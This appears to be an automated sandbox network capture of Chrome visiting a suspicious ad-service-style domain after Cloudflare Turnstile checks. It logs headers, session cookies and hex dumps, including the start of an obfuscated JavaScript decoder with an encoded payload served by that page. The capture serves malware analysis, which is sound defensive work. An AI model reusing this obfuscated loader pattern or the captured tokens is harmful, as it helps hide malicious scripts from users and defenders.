                                                                                                                                      2024-05-08 18:12:43 UTC891INData Raw: 36 36 65 0d 0a 6b 59 75 45 6a 6d 42 6b 61 47 65 49 65 58 42 74 68 6f 2b 50 62 6e 52 36 65 36 53 54 64 48 52 76 6c 34 64 71 66 33 61 4d 66 59 75 51 6f 36 53 79 68 35 4f 48 62 71 6d 42 73 62 70 30 64 5a 2b 4a 6c 35 36 6a 6a 5a 35 38 73 61 57 68 75 70 37 49 76 5a 58 4e 7a 6f 6a 42 6a 71 65 72 31 70 4b 66 71 35 4c 59 6b 63 32 30 6c 74 36 58 75 36 4b 78 76 74 65 76 74 4e 6e 41 70 75 71 6b 75 4c 2b 39 78 4c 79 2f 76 63 7a 46 39 36 33 69 35 4f 6a 37 31 4d 65 2b 31 74 76 4e 38 63 76 64 39 73 34 46 2b 64 48 54 43 38 51 50 34 39 33 6b 41 74 49 4b 37 4f 44 6d 47 50 48 6b 31 75 4d 4f 35 65 73 66 31 2f 7a 33 2b 41 30 57 35 69 6a 32 46 78 72 36 46 79 63 70 4d 53 38 71 41 78 4c 6d 4a 44 44 76 4e 76 55 72 47 52 41 76 45 42 6b 5a 2f 54 30 55 41 7a 45 6b 48 68 77 30 46 69
                                                                                                                                      Data Ascii: 66ekYuEjmBkaGeIeXBtho+PbnR6e6STdHRvl4dqf3aMfYuQo6Syh5OHbqmBsbp0dZ+Jl56jjZ58saWhup7IvZXNzojBjqer1pKfq5LYkc20lt6Xu6KxvtevtNnApuqkuL+9xLy/vczF963i5Oj71Me+1tvN8cvd9s4F+dHTC8QP493kAtIK7ODmGPHk1uMO5esf1/z3+A0W5ij2Fxr6FycpMS8qAxLmJDDvNvUrGRAvEBkZ/T0UAzEkHhw0Fi
                                                                                                                                      2024-05-08 18:12:43 UTC762INData Raw: 50 34 4c 4f 73 4e 44 77 48 6e 42 75 76 77 2f 52 45 56 38 7a 59 61 39 50 67 36 4b 66 67 65 51 69 73 54 51 45 59 77 49 78 70 4c 49 68 77 37 44 53 38 73 48 69 67 39 52 55 67 2f 4d 30 6b 59 46 6b 55 55 4e 69 5a 4d 4c 45 74 69 54 54 4d 2b 4a 55 41 7a 61 45 52 47 4e 7a 35 47 55 44 35 53 61 6b 74 44 64 46 46 59 56 56 4a 49 56 31 68 65 62 56 6b 35 62 46 6c 69 64 31 64 57 58 55 46 4a 57 32 70 44 56 6f 4a 6a 67 31 70 66 5a 6e 42 69 68 59 64 69 55 59 56 76 65 6d 61 49 69 48 2b 67 64 58 74 7a 63 70 32 47 6e 70 68 36 69 36 4b 62 72 34 70 70 62 59 71 64 62 4c 53 4d 6c 4b 79 34 71 70 4f 4a 76 4a 69 56 65 70 4b 61 6f 6e 79 6d 78 71 61 36 69 49 69 6a 6c 38 79 35 71 6f 76 41 6f 62 36 6a 70 72 4c 41 70 72 4c 50 78 71 6a 49 7a 73 66 54 6f 4a 36 37 77 74 2b 6d 30 63 62 6b 35
                                                                                                                                      Data Ascii: P4LOsNDwHnBuvw/REV8zYa9Pg6KfgeQisTQEYwIxpLIhw7DS8sHig9RUg/M0kYFkUUNiZMLEtiTTM+JUAzaERGNz5GUD5SaktDdFFYVVJIV1hebVk5bFlid1dWXUFJW2pDVoJjg1pfZnBihYdiUYVvemaIiH+gdXtzcp2Gnph6i6Kbr4ppbYqdbLSMlKy4qpOJvJiVepKaonymxqa6iIijl8y5qovAob6jprLAprLPxqjIzsfToJ67wt+m0cbk5
                                                                                                                                      2024-05-08 18:12:43 UTC1369INData Raw: 37 37 65 0d 0a 45 31 56 53 45 34 5a 30 56 4d 4c 33 46 62 4b 55 51 7a 58 6a 42 79 64 56 42 57 54 48 6c 55 4e 56 68 2b 57 6b 35 63 67 31 31 52 50 34 64 7a 66 6b 4f 49 5a 45 69 4b 6a 33 78 68 5a 4a 52 2f 54 58 42 57 67 33 68 53 55 6f 70 71 62 47 68 34 58 48 78 74 66 49 46 6e 5a 34 42 68 64 4b 71 58 66 61 35 76 69 4c 4e 72 73 35 35 77 74 72 4f 6a 69 62 71 38 6c 4b 6c 37 75 4a 71 41 65 5a 50 43 6d 70 4f 47 6e 59 6d 64 75 4d 6e 42 30 4b 32 50 6e 5a 36 4f 70 62 43 6f 75 63 69 75 79 4e 79 72 73 4b 76 63 74 4e 36 7a 73 39 6d 63 76 37 6e 54 36 4d 44 74 32 4e 6e 48 36 72 37 4d 38 76 48 77 71 4d 62 6f 78 4d 4c 52 36 74 44 6f 79 37 33 4b 38 4f 53 37 42 4f 2f 36 30 4d 66 38 39 4e 77 4e 78 4e 72 61 2f 67 58 38 34 77 59 48 7a 78 6a 6e 43 42 51 56 33 66 7a 56 2b 2b 6b 5a
                                                                                                                                      Data Ascii: 77eE1VSE4Z0VML3FbKUQzXjBydVBWTHlUNVh+Wk5cg11RP4dzfkOIZEiKj3xhZJR/TXBWg3hSUopqbGh4XHxtfIFnZ4BhdKqXfa5viLNrs55wtrOjibq8lKl7uJqAeZPCmpOGnYmduMnB0K2PnZ6OpbCouciuyNyrsKvctN6zs9mcv7nT6MDt2NnH6r7M8vHwqMboxMLR6tDoy73K8OS7BO/60Mf89NwNxNra/gX84wYHzxjnCBQV3fzV++kZ
                                                                                                                                      2024-05-08 18:12:43 UTC556INData Raw: 31 4d 4e 6c 5a 4b 4a 32 52 4e 5a 7a 78 73 58 30 4e 44 4e 6d 4a 57 57 48 5a 52 57 6e 4a 33 61 6c 31 58 67 56 35 32 51 6f 56 6d 65 31 78 35 61 6c 71 43 65 57 39 77 6a 6d 39 6f 64 5a 5a 30 63 31 52 30 68 58 46 58 6c 6d 79 52 63 57 79 4f 6a 6c 32 53 65 70 6c 33 5a 33 2b 61 65 59 53 71 6b 4b 5a 76 68 70 31 75 63 6d 36 4f 69 4c 71 47 6e 70 32 49 77 4a 6d 4e 76 72 32 63 75 63 58 48 6f 37 75 44 79 72 57 74 6f 4d 79 78 77 36 54 4a 73 4d 6d 78 70 62 44 4c 73 4b 6d 38 71 39 72 65 75 4e 50 65 74 72 76 45 78 4c 72 48 70 64 72 61 7a 73 6d 68 77 4d 32 2f 7a 4d 33 57 78 74 53 32 30 64 69 7a 78 65 61 34 31 41 4c 5a 39 77 4d 43 38 62 2f 47 79 4f 48 2b 79 73 4c 6d 33 64 6a 63 36 75 48 67 33 4f 7a 31 35 42 6b 44 2b 4e 62 53 43 74 6a 73 31 77 77 59 39 43 62 2b 39 53 4d 6f 45
                                                                                                                                      Data Ascii: 1MNlZKJ2RNZzxsX0NDNmJWWHZRWnJ3al1XgV52QoVme1x5alqCeW9wjm9odZZ0c1R0hXFXlmyRcWyOjl2Sepl3Z3+aeYSqkKZvhp1ucm6OiLqGnp2IwJmNvr2cucXHo7uDyrWtoMyxw6TJsMmxpbDLsKm8q9reuNPetrvExLrHpdrazsmhwM2/zM3WxtS20dizxea41ALZ9wMC8b/GyOH+ysLm3djc6uHg3Oz15BkD+NbSCtjs1wwY9Cb+9SMoE
                                                                                                                                      2024-05-08 18:12:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      26192.168.2.1649744104.17.2.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:43 UTC486OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385 HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:43 UTC377INHTTP/1.1 400 Bad Request
                                                                                                                                      Date: Wed, 08 May 2024 18:12:43 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 7
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                      cf-chl-out: NyavbzKhIF9c7fgNg5CMYw==$0DYJWwGU5ZZVjfpGE1vyQw==
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b6d3ec4eb9f-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:43 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                      Data Ascii: invalid


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      27192.168.2.1649745104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:43 UTC1506OUTPOST /zu1fyxZK9POg2bBgIN1dk26NB5O25su HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Content-Length: 1360
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAx3i1L6wTf8rYkTC
                                                                                                                                      Accept: */*
                                                                                                                                      Origin: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6Ik0zZXU5YmFkS3YzdkxkSGY0RGcwM3c9PSIsInZhbHVlIjoiTDB2RzJ4UHRKWVdKKy9uOE9rRXBuOWZmbFhIaFIvNmRSYmpVbldlcEF4a3ZPOEg0YUFsQlVMQkd4NG1BOTNpZEsvcW5CRjBKQzlic0dTTEFtRVZZdmdrVk40QjUxYTBxRnhWVE84VnQ4eEVxOGJmY3VyZEI0MzdodnRROER4SFoiLCJtYWMiOiIzNDMyZTg1MmY0Y2Y2ZTk1NDk5NTJjYTBjMWJjOTJiYTc2YWNmYTE2ODI4OWVhOGIyNWMxZGM2ODgwMTU0NTIwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjJXMWNmampPQU9BeDNWQjR6RzY4bmc9PSIsInZhbHVlIjoiVk5EN2QralJTbW9rVGNqMnpJdUNJSCtPaTA4Zm5LMUtVaTYwV0NXclAzL2xnVU10cERzU0ZHRk1maXp6MVl2cE5wNGp3bjFFa3lHeTZhZG5SdWs2V0lySzR5NkhmU3NMa29XMGs0WmVLUjZTbmRiYWY3NGNDZEN3NW41dElkTXYiLCJtYWMiOiIxZjg2MGMzN2ZhZDUxYTZlYWVlMWRiM2RjNTQxM2QxNGU3OWQ4NjVjNTdmMmUwMWM0Yjk5ZjdjMTZmNTE3NmQwIiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:43 UTC1360OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 41 78 33 69 31 4c 36 77 54 66 38 72 59 6b 54 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 50 53 4c 75 56 49 2d 67 41 72 76 69 70 5a 32 68 5f 37 47 70 32 5a 4b 45 77 6e 4a 5f 67 66 6b 46 71 77 59 48 6c 4f 49 36 68 6f 6a 30 5a 69 39 52 6f 61 2d 42 67 39 2d 63 64 66 5a 74 75 75 47 6a 76 34 55 74 46 7a 50 5f 36 66 55 44 70 72 70 67 64 41 5a 51 30 6b 65 59 38 5a 33 64 74 47 65 6a 47 77 44 37 37 30 4e 33 4d 38 33 36 73 30 79 2d 79 42 62 57 33 7a 58 53 64 7a 30 51 65 39 6c 73 35 31 39 61 79 53 69 73 55 41 4f 4b 65 39 50 4e 51 6f 52
                                                                                                                                      Data Ascii: ------WebKitFormBoundaryAx3i1L6wTf8rYkTCContent-Disposition: form-data; name="cf-turnstile-response"0.PSLuVI-gArvipZ2h_7Gp2ZKEwnJ_gfkFqwYHlOI6hoj0Zi9Roa-Bg9-cdfZtuuGjv4UtFzP_6fUDprpgdAZQ0keY8Z3dtGejGwD770N3M836s0y-yBbW3zXSdz0Qe9ls519aySisUAOKe9PNQoR
                                                                                                                                      2024-05-08 18:12:44 UTC1003INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:44 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LwsDbJL1%2FjKeqFoWBv3bxmxikIQjT0zV61fi5Ye8DQOVT5Jh%2FeooE80K1jpeRm52UqSGMFbBDxlou6e%2BT5ayX7YtYt6snDgQiCad9z%2BVY%2BeXARn%2ByFpSHTTrdtHaug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6ImN1T3N4dU9rZEcyVy94Sk5zd3hFcEE9PSIsInZhbHVlIjoianNqTWUrWlJpay9SNHp1eHZGRndBQVNrb1pwWmIwRFQ4M3BoZFlqYy9pbE8zQWhJZnNGQnpDWXRjZytoZkpvS1NYRmJ2YUZrZkx4cURUazVyYUdQVHB6S0ZtY0NDek9Ec0tkRFF2a0N6K2c2S1NoVjlLblNJL25jQ0gvZnRzTVQiLCJtYWMiOiI5NmRlNjgwNGE4Nzk5NDViMzM3NTQ4Mzg5NDA5YTlkNDFmNmU0OTIzOGM3ZDRjYWU3ZTE4NGYxMGZhNzQ0NTJlIiwidGFnIjoiIn0%3D; expires=Wed, 08-May-2024 20:12:43 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                      2024-05-08 18:12:44 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 42 6b 54 57 70 30 65 6e 6c 4f 51 7a 56 45 54 6c 4e 51 62 6e 45 78 56 54 4e 34 55 48 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 56 68 58 54 6c 70 56 4d 6a 52 4e 62 32 73 34 55 6a 64 59 65 54 55 76 4d 45 68 7a 4d 57 68 6b 54 58 4e 32 52 32 5a 30 4c 33 6f 79 4e 58 4a 50 55 32 52 6b 53 57 64 57 5a 57 70 32 57 47 56 46 5a 46 4e 33 4e 47 78 4d 54 44 6c 43 52 45 4e 71 52 53 39 44 52 44 64 6f 52 54 42 46 63 57 74 76 55 79 39 74 55 31 49 7a 56 53 74 79 59 6a 63 72 52 54 59 76 56 56 46 49 56 57 6c 55 4c 30 70 4d 54 47 46 53 57 57 34 35 55 57 4e 69 55 6d 38 35 64 46 68 6b 5a 31 5a 44 56 79 74 44 54 44 42 72 55 7a 55 77 5a 58 68 4e 63 47 59
                                                                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlBkTWp0enlOQzVETlNQbnExVTN4UHc9PSIsInZhbHVlIjoicVhXTlpVMjRNb2s4UjdYeTUvMEhzMWhkTXN2R2Z0L3oyNXJPU2RkSWdWZWp2WGVFZFN3NGxMTDlCRENqRS9DRDdoRTBFcWtvUy9tU1IzVStyYjcrRTYvVVFIVWlUL0pMTGFSWW45UWNiUm85dFhkZ1ZDVytDTDBrUzUwZXhNcGY
                                                                                                                                      2024-05-08 18:12:44 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                                                                                                      Data Ascii: 14{"status":"success"}
                                                                                                                                      2024-05-08 18:12:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      28192.168.2.1649746104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:44 UTC1527OUTGET /7FF88B1/ HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Cache-Control: max-age=0
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/7FF88B1/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6ImN1T3N4dU9rZEcyVy94Sk5zd3hFcEE9PSIsInZhbHVlIjoianNqTWUrWlJpay9SNHp1eHZGRndBQVNrb1pwWmIwRFQ4M3BoZFlqYy9pbE8zQWhJZnNGQnpDWXRjZytoZkpvS1NYRmJ2YUZrZkx4cURUazVyYUdQVHB6S0ZtY0NDek9Ec0tkRFF2a0N6K2c2S1NoVjlLblNJL25jQ0gvZnRzTVQiLCJtYWMiOiI5NmRlNjgwNGE4Nzk5NDViMzM3NTQ4Mzg5NDA5YTlkNDFmNmU0OTIzOGM3ZDRjYWU3ZTE4NGYxMGZhNzQ0NTJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBkTWp0enlOQzVETlNQbnExVTN4UHc9PSIsInZhbHVlIjoicVhXTlpVMjRNb2s4UjdYeTUvMEhzMWhkTXN2R2Z0L3oyNXJPU2RkSWdWZWp2WGVFZFN3NGxMTDlCRENqRS9DRDdoRTBFcWtvUy9tU1IzVStyYjcrRTYvVVFIVWlUL0pMTGFSWW45UWNiUm85dFhkZ1ZDVytDTDBrUzUwZXhNcGYiLCJtYWMiOiJmMTZmMGY2NzQ1ODNhMTI3MjE3YjAxOGRjNjcxMWYzNmE1ZjYyNjdiYzdiZTZmODM4MTZkNzY5YmY2YzUxY2I0IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:45 UTC1007INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:45 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, private
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oVCl2qyVgipeY25JKBih8nNqkosjnCehZOT0o9yB2CJyXuMtwn3ni2%2BMUoJ%2BcrbcSTzr5No%2Fbl0lqK6goNrlZbr7tmW3Dx%2BODAfPK004r6G1WX5Z1BjQnYIJZUx5bA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IjExeTZES0xrOXQybVJTL04vaW1NeFE9PSIsInZhbHVlIjoidnFZRE4yUDFWU0l2MkhHa293cmQwRUg1ak1oalpHMW9NQ0VZOUJEZDEzWDRsZkhiM1JCbjhKR01rRnZ2OWJUa2ttK1d1Z3ZyNVUrQVZnbjlKd0w3ZFJPbjkyeW1UeGMxZG00Zk1OU29ycTNQOVRvYm8wOTR3UktQTmgwYXJoVWQiLCJtYWMiOiJkNTQyMGM5YTk3NjViMmZjNjUzN2IyOTk5MTI2M2Y4ODViM2EwYWRjOWU1NWUzNmU1NDgxY2ExMjJkZjBkYzY2IiwidGFnIjoiIn0%3D; expires=Wed, 08-May-2024 20:12:44 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                      2024-05-08 18:12:45 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 69 39 73 55 32 35 33 64 6e 45 33 4d 47 74 78 4b 32 63 35 62 6a 64 48 4d 33 64 73 54 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4d 6d 70 32 53 6d 59 31 63 58 51 76 61 6c 4d 79 51 32 6b 34 4d 6b 5a 36 4e 30 31 77 64 6d 5a 6b 55 32 70 78 52 6c 42 4d 51 55 46 5a 51 32 39 75 54 44 6c 77 56 58 4e 46 54 6e 68 6e 52 45 51 30 61 6b 46 53 53 30 52 4e 53 32 56 69 4d 47 52 74 52 56 49 34 65 45 68 6a 59 31 4a 68 55 45 51 77 56 45 6f 7a 65 47 52 68 51 57 52 75 55 32 35 47 4e 7a 42 70 62 6e 5a 4b 5a 6a 64 6d 63 30 6c 45 52 6a 42 7a 55 55 64 4a 52 6d 63 76 51 6c 56 6d 52 56 5a 4d 53 6d 46 70 59 6b 52 30 65 6b 6c 47 55 30 6c 70 62 48 42 53 63 44 67
                                                                                                                                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ii9sU253dnE3MGtxK2c5bjdHM3dsTnc9PSIsInZhbHVlIjoiMmp2SmY1cXQvalMyQ2k4MkZ6N01wdmZkU2pxRlBMQUFZQ29uTDlwVXNFTnhnREQ0akFSS0RNS2ViMGRtRVI4eEhjY1JhUEQwVEozeGRhQWRuU25GNzBpbnZKZjdmc0lERjBzUUdJRmcvQlVmRVZMSmFpYkR0eklGU0lpbHBScDg
                                                                                                                                      2024-05-08 18:12:45 UTC1213INData Raw: 37 31 34 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 78 43 44 4a 4f 4c 58 57 47 64 28 44 4f 4a 56 6d 44 70 50 57 51 2c 20 6f 50 71 74 58 4f 6b 72 61 67 29 20 7b 0d 0a 6c 65 74 20 59 43 71 4c 71 73 6f 73 7a 70 20 3d 20 27 27 3b 0d 0a 44 4f 4a 56 6d 44 70 50 57 51 20 3d 20 61 74 6f 62 28 44 4f 4a 56 6d 44 70 50 57 51 29 3b 0d 0a 6c 65 74 20 56 66 75 62 61 70 43 6d 72 72 20 3d 20 6f 50 71 74 58 4f 6b 72 61 67 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 44 4f 4a 56 6d 44 70 50 57 51 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 59 43 71 4c 71 73 6f 73 7a 70 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 44 4f 4a 56 6d 44 70 50 57 51 2e 63 68 61 72 43 6f
                                                                                                                                      Data Ascii: 714<script>function xCDJOLXWGd(DOJVmDpPWQ, oPqtXOkrag) {let YCqLqsoszp = '';DOJVmDpPWQ = atob(DOJVmDpPWQ);let VfubapCmrr = oPqtXOkrag.length;for (let i = 0; i < DOJVmDpPWQ.length; i++) { YCqLqsoszp += String.fromCharCode(DOJVmDpPWQ.charCo
                                                                                                                                      2024-05-08 18:12:45 UTC606INData Raw: 4b 78 59 48 58 43 31 41 4a 51 51 73 49 32 70 66 54 6b 51 71 41 43 6b 5a 50 6d 73 6d 44 51 31 53 4e 77 63 69 47 47 63 31 4b 78 59 47 58 53 49 44 4b 46 5a 69 5a 57 68 64 54 42 4e 6f 54 6d 38 63 61 32 56 68 51 6b 78 36 59 55 35 6d 56 67 63 42 42 79 67 38 65 6a 4d 2f 49 53 52 79 53 45 42 43 54 68 4e 6a 45 30 42 38 4e 47 55 76 44 68 31 57 59 78 56 41 66 47 6c 6c 61 6b 49 59 55 6a 46 4f 41 7a 49 45 44 78 67 72 48 6d 49 76 50 47 31 4c 61 57 30 63 4e 7a 64 79 49 52 51 2f 4d 79 77 6a 5a 41 38 50 52 79 41 47 5a 56 6c 68 48 68 59 56 51 42 34 65 52 51 30 74 4b 47 67 77 49 30 4e 70 63 30 4e 30 57 47 51 59 59 54 35 41 61 43 4a 44 4e 7a 64 6b 48 33 70 50 56 32 34 34 58 47 45 4c 59 47 70 6a 51 68 4a 50 59 7a 55 6a 41 79 55 70 46 30 73 31 41 78 35 56 51 48 78 70 5a 57 70
                                                                                                                                      Data Ascii: KxYHXC1AJQQsI2pfTkQqACkZPmsmDQ1SNwciGGc1KxYGXSIDKFZiZWhdTBNoTm8ca2VhQkx6YU5mVgcBByg8ejM/ISRySEBCThNjE0B8NGUvDh1WYxVAfGllakIYUjFOAzIEDxgrHmIvPG1LaW0cNzdyIRQ/MywjZA8PRyAGZVlhHhYVQB4eRQ0tKGgwI0Npc0N0WGQYYT5AaCJDNzdkH3pPV244XGELYGpjQhJPYzUjAyUpF0s1Ax5VQHxpZWp
                                                                                                                                      2024-05-08 18:12:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      29192.168.2.1649750104.21.15.1404435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:44 UTC1124OUTGET /zu1fyxZK9POg2bBgIN1dk26NB5O25su HTTP/1.1
                                                                                                                                      Host: 0n18pyx-clickadservices-rebooot0fa.foeclec.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Cookie: XSRF-TOKEN=eyJpdiI6ImN1T3N4dU9rZEcyVy94Sk5zd3hFcEE9PSIsInZhbHVlIjoianNqTWUrWlJpay9SNHp1eHZGRndBQVNrb1pwWmIwRFQ4M3BoZFlqYy9pbE8zQWhJZnNGQnpDWXRjZytoZkpvS1NYRmJ2YUZrZkx4cURUazVyYUdQVHB6S0ZtY0NDek9Ec0tkRFF2a0N6K2c2S1NoVjlLblNJL25jQ0gvZnRzTVQiLCJtYWMiOiI5NmRlNjgwNGE4Nzk5NDViMzM3NTQ4Mzg5NDA5YTlkNDFmNmU0OTIzOGM3ZDRjYWU3ZTE4NGYxMGZhNzQ0NTJlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBkTWp0enlOQzVETlNQbnExVTN4UHc9PSIsInZhbHVlIjoicVhXTlpVMjRNb2s4UjdYeTUvMEhzMWhkTXN2R2Z0L3oyNXJPU2RkSWdWZWp2WGVFZFN3NGxMTDlCRENqRS9DRDdoRTBFcWtvUy9tU1IzVStyYjcrRTYvVVFIVWlUL0pMTGFSWW45UWNiUm85dFhkZ1ZDVytDTDBrUzUwZXhNcGYiLCJtYWMiOiJmMTZmMGY2NzQ1ODNhMTI3MjE3YjAxOGRjNjcxMWYzNmE1ZjYyNjdiYzdiZTZmODM4MTZkNzY5YmY2YzUxY2I0IiwidGFnIjoiIn0%3D
                                                                                                                                      2024-05-08 18:12:45 UTC581INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Wed, 08 May 2024 18:12:45 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
